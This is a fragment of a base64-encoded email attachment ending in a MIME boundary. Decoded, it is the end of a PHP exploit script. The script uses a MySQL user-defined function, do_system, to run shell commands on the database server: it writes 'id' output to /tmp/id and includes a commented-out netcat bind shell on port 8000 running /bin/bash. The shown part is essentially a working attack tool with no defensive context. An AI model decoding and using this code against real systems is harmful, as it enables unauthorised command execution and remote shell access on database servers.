IG15c3FsX2Vycm9yKCkpOwp9CmVjaG8gIkNvbm5lY3RlZCB0byBNeVNxbCBzZXJ2ZXIgYWdhaW4u
Li5cbiI7CgovLyRjbWQgPScvdXNyL3NiaW4vbmMgLWwgLXAgODAwMCAtZSAvYmluL2Jhc2gnOwok
Y21kID0naWQgPi90bXAvaWQnOwplY2hvICJTZW5kaW5nIENvbW1hbmQuLi4kY21kXG4iOwokcXVl
cnk9InNlbGVjdCBkb19zeXN0ZW0oJyRjbWQnKTsiOwokcmVzdWx0ID0gbXlzcWxfcXVlcnkoJHF1
ZXJ5LCAkbGluayk7CmVjaG8gImRvbmUhXG4iOwplY2hvICJOb3cgdXNlIHlvdXIgZmF2IHNoZWxs
IGFuZCBscyAvdG1wL2lkIC1sIFxuIjsKbXlzcWxfY2xvc2UoJGxpbmspOwoKPz4K
--=-hDpE8TGdWjVzZtJy4jG/--
